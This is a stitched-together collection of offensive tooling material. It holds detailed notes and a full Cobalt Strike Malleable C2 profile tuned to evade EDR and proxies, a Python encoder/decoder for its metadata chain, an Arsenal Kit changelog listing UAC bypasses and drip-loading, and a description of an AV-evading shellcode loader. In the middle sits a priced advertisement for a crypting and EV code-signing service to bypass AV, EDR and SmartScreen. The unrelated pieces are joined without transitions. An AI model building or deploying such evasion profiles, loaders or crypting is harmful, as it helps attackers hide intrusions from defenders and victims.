Evasion through traffic mimicry
- Adds "msrpc-azure" and plausible MIME types (yin+xml, vnd.fly, application/javascript) plus response headers imitating IIS 10.0/ASP.NET/IBM_HTTP_Server, so the traffic passes for an enterprise stack (Azure AD, legacy WebDAV, NETCONF).
- jQuery v3.4.1 + jQuery UI v1.12.1 prepend/append is a strong way to disguise responses as legitimate JS libraries; EDR/proxies are tuned to "C2-like" patterns.
- URIs like /compare/v1.44/VXK7P0GBE8 and /Build/v1.85/JDX894ZM2WF1 (version + token).
- Metadata/session id carried in a cookie (SESSIONID_...=) and a query parameter (_KZZUEUVN=).
Data obfuscation
- mask + base64url/netbiosu: double/triple encoding. netbiosu (upper case) is case-sensitive, so a decoder must keep the exact case.
Process injection / stage
- VirtualAllocEx allocator for injection + HeapAlloc for BOFs.
- startrwx/userwx set to "false": avoids RWX memory regions, which EDRs key on.
- bof_reuse_memory "true" + min_alloc 16384: reuses one allocation across BOFs and rounds it up to 16 KB instead of allocating fresh each time.
- NOP/junk transforms (prepend "\x90\x90" on x86, a longer list on x64): breaks static byte signatures of the injected code.
- host_stage "false" is another OPSEC measure: no stager payload is hosted on the C2, which reduces the server's exposure to scanners and fingerprinting.
Sleep and jitter
- sleep 30,000 ms (30 s) + 33% jitter: sidesteps detectors keyed on "fast C2" beaconing.
OPSEC
- pipe name "Winsock2\CatalogChangeListener-####-0": a custom name that imitates system (Windows Winsock) pipes.
- user agent "<RAND>": random Internet Explorer-style UA.
- ssh_banner Ubuntu + custom pipe: tuned for SSH post-exploitation (evasion in Linux/hybrid environments).
- tasks_max_remote_size 2 MB: raises an OPSEC warning on oversized payloads.
- create_remote_thread/hijack_remote_thread "true": permits remote-thread creation and thread hijacking as injection techniques.
- https-certificate: Azure mimic (CN "*.azureedge.net") so TLS looks like CDN traffic. Caveat: the certificate generated from this block is self-signed, so the disguise only holds against inspection that does not validate the chain; otherwise a redirector with a CA-issued certificate is needed in front of the team server.
https://github.com/cfs0x/Evasion-Profiles
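As an added illustration (not the repile's actual profile from the repository, and not Cobalt Strike's own code), the options listed above written out in Malleable C2 profile syntax. Header values, the jQuery banner strings, the SSH banner and the URIs are placeholders; tasks_max_remote_size and the user-agent setting are left out because the page does not show their exact syntax.

```text
# Added illustration of the options described above. Placeholder values are marked.
set sleeptime  "30000";      # 30 s base sleep
set jitter     "33";         # +/- 33 % jitter
set host_stage "false";      # no stager hosted on the team server
set pipename   "Winsock2\\CatalogChangeListener-####-0";   # '#' = random hex
set ssh_banner "OpenSSH_8.9p1 Ubuntu-3ubuntu0.10";         # placeholder banner

https-certificate {
    set CN "*.azureedge.net";   # self-signed; only fools non-validating inspection
    set O  "Microsoft Corporation";
    set C  "US";
}

http-get {
    set uri "/compare/v1.44 /Build/v1.85";                 # placeholders
    client {
        header "Accept" "application/javascript, */*";
        metadata {
            mask;            # XOR with random 4-byte key
            base64url;
            netbiosu;        # 'A'..'P', upper case
            prepend "SESSIONID_";
            header "Cookie";
        }
    }
    server {
        header "Server" "Microsoft-IIS/10.0";
        header "X-Powered-By" "ASP.NET";
        header "Content-Type" "application/javascript";
        output {
            mask;
            base64url;
            prepend "/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */";
            append  "/*! jQuery UI - v1.12.1 */";          # placeholder
            print;
        }
    }
}

http-post {
    set uri "/Build/v1.85/";                               # placeholder
    client {
        id {
            mask;
            base64url;
            parameter "_KZZUEUVN";
        }
        output {
            mask;
            base64url;
            print;
        }
    }
    server {
        header "Server" "Microsoft-IIS/10.0";
        output {
            mask;
            base64url;
            print;
        }
    }
}

process-inject {
    set allocator        "VirtualAllocEx";
    set bof_allocator    "HeapAlloc";
    set bof_reuse_memory "true";
    set min_alloc        "16384";
    set startrwx         "false";
    set userwx           "false";
    transform-x86 { prepend "\x90\x90"; }
    transform-x64 { prepend "\x90\x90\x90\x90"; }          # stand-in for the longer x64 list
    execute {
        CreateThread "ntdll!RtlUserThreadStart";
        SetThreadContext;
        CreateRemoteThread;
    }
}
```

Run `c2lint` against the full profile before deploying; it reports keyword typos and the OPSEC warnings the page mentions.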
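The "Data obfuscation" bullet above says metadata is encoded as mask + base64url + netbiosu before being dropped into the SESSIONID_ cookie. The following is an added example, not code from the Evasion-Profiles repository or from Cobalt Strike: a stand-alone Python reimplementation of that transform chain in both directions, so an analyst who has the profile can decode a captured cookie value. The mask layout (4 random key bytes prepended to the XORed data) follows the documented behaviour of the mask transform and should be treated as an assumption when decoding real captures; the sample metadata and the fixed key are constructed for the demo.

```python
"""mask -> base64url -> netbiosu -> prepend: encode and decode the chain.

Added example (not from the Evasion-Profiles repository, not Cobalt Strike's
own code). COOKIE_PREFIX mirrors the profile's "prepend"; the sample
metadata below is constructed, not real beacon metadata.
"""
import base64
import os
from typing import Optional

NETBIOS_ALPHABET = "ABCDEFGHIJKLMNOP"   # netbiosu: one nibble per letter, 'A'..'P'
COOKIE_PREFIX = "SESSIONID_"            # the profile's "prepend" before the cookie


def mask(data: bytes, key: Optional[bytes] = None) -> bytes:
    """'mask' transform: XOR with a random 4-byte key, key prepended (assumed layout)."""
    key = os.urandom(4) if key is None else key
    if len(key) != 4:
        raise ValueError("mask key must be exactly 4 bytes")
    return key + bytes(b ^ key[i % 4] for i, b in enumerate(data))


def unmask(blob: bytes) -> bytes:
    """Reverse of mask(): the first 4 bytes are the key."""
    if len(blob) < 4:
        raise ValueError("masked blob is shorter than its 4-byte key")
    key = blob[:4]
    return bytes(b ^ key[i % 4] for i, b in enumerate(blob[4:]))


def base64url_encode(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data)


def base64url_decode(data: bytes) -> bytes:
    # Tolerate stripped padding: captured values may or may not keep '='.
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def netbiosu_encode(data: bytes) -> bytes:
    """Each byte becomes two letters: high nibble then low nibble, 'A' + nibble."""
    out = bytearray()
    for b in data:
        out.append(ord("A") + (b >> 4))
        out.append(ord("A") + (b & 0x0F))
    return bytes(out)


def netbiosu_decode(data: bytes) -> bytes:
    """Case-sensitive: lower-case letters belong to 'netbios', not 'netbiosu'."""
    text = data.decode("ascii")
    if len(text) % 2 or any(c not in NETBIOS_ALPHABET for c in text):
        raise ValueError("not a netbiosu string (expect an even count of 'A'..'P')")
    nibbles = [NETBIOS_ALPHABET.index(c) for c in text]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))


def encode_metadata(metadata: bytes, key: Optional[bytes] = None) -> str:
    """Apply the chain in profile order: mask; base64url; netbiosu; prepend."""
    encoded = netbiosu_encode(base64url_encode(mask(metadata, key)))
    return COOKIE_PREFIX + encoded.decode("ascii")


def decode_metadata(cookie: str) -> bytes:
    """Undo the chain in reverse: strip prefix, netbiosu, base64url, unmask."""
    if not cookie.startswith(COOKIE_PREFIX):
        raise ValueError("cookie lacks the profile's prefix")
    body = cookie[len(COOKIE_PREFIX):].encode("ascii")
    return unmask(base64url_decode(netbiosu_decode(body)))


if __name__ == "__main__":
    sample = b"constructed-beacon-metadata"   # constructed, not real beacon metadata
    cookie = encode_metadata(sample, key=b"\x01\x02\x03\x04")
    print(cookie)
    assert decode_metadata(cookie) == sample
```

The decoder refuses lower-case input on purpose: a profile using `netbios` instead of `netbiosu` produces 'a'..'p', and silently accepting both would hide a profile mismatch when triaging captures.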
Prices for CFS CRYPT tariff plans are dynamic and may change depending on current infrastructure load, target audience, and market conditions.
The listed prices are valid at the moment but may increase or decrease depending on these factors.
Over time, exclusive technologies and solutions will be added to each tariff plan and will remain available only within that plan.
Your [code] EV Code Signing + CFS CRYPT:
Bypass AV / EDR / SmartScreen / Chrome alert
- 175💵 1st file
- 250💵 2 files
- 350💵 3 files
- 450💵 4 files
- 550💵 week unlimited
- 3k💵 month unlimited
If you work with large volumes or are a regular customer, we are ready to offer you better terms.
Warranty is always a priority for us, not an option but a standard of work, regardless of the amount, tariff or terms of the transaction.
We provide firm guarantees that you get exactly what you pay for, in full and on time.
# Arsenal Kit 20251122
e5e99066e154b623526c7620ea226c99bf68371d9d9ef4597c404c701e6a06f3 arsenal-kit20251122.tgz November 2025 - Cobalt Strike 4.12
-------------
+ Added drip-loader support.
Added drip-loading in beacon for memory allocation/process inject.
Added drip-loading in the reflective loader.
Changed ALLOCATED_MEMORY_* structures (USER_DATA.version 4.12 requires updated structures - breaking change for sleepmask).
Added UDC2 beacons for User Defined Command and Control (UDC2).
Added task IDs to associate task/command input and retrieved output in logs.
Added results from File Browser list files (ls) and Process Browser list processes (ps) to beacon logs.
Process Injection Overhaul
Added injection techniques in the client.
Added PROCESS_INJECT_EXPLICIT_USER and PROCESS_INJECT_SPAWN_USER aggressor hooks for adding user-defined injections to the UI.
+ Added REST API server [BETA]
Introduced a new REST API server designed to run alongside the team server, providing access to Cobalt Strike functionality via REST.
Enhanced the team server to add task tracking to support task/response relationships through the REST API.
Enabled centralized artifact management through the REST API.
Added SOCKS5 IPv6 support which is limited to TCP.
BOF Improvements
Added an API for BeaconDownload.
Updated to use Dynamic Import which removes the limits on the number of Beacon Object File Imports.
+ Updated pivot beacons (SMB and TCP) to use overlapped IO for named pipes/sockets (breaking change with previous versions).
Updated and simplified the sleepmask entry point.
+ GUI Overhaul
Switched look and feel from Synthetica to FlatLNF.
Added new look and feel themes.
Replaced various product icons.
Replaced "colorPanel" aggressor function with "colorMenu".
Updated beacon session list external column link/unlink text symbol to an icon.
Updated File Browser tree to wait until the previous click finishes loading before accepting another click (avoids double-loading).
Added labels to pivot graph links.
Updated SSH beacon to work on newer Linux distros.
Added new UAC bypasses.
Added "beacon_info" command to list beacon memory information.
Updated beacon cleanup and exit procedures.
Fixed help for "beacon_config".
Fixed issue preventing BEACON_RDLL_GENERATE_LOCAL hook from firing.
Fixed issue where tasks larger than Task Max Size would crash beacon.
Updated java dependencies from Java 11 to Java 17.
- Removed support for the StompLoader.
The classic C++ shellcode loader for Windows, written to maximize bypass of antivirus and sandboxes (including Microsoft Defender and EDR systems such as CrowdStrike, SentinelOne, etc.).
This is code that takes prepared shellcode (small machine code, the payload), places it in memory and executes it without creating a new thread and without explicitly calling CreateThread/QueueUserAPC, to stay as quiet as possible.
Clematis: a tool for converting PE files (EXE/DLL) into position-independent shellcode. https://github.com/CBLabresearch/Clematis
